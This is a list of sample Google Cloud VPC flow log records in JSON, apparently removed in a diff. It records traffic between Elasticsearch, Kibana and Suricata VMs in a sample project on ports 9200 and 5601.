-{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"203.0.113.134","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"203.0.113.134","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.0.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"203.0.113.134","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"203.0.113.134","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"203.0.113.134","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"203.0.113.134","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"203.0.113.134","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"203.0.113.134","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"203.0.113.58","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project
","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
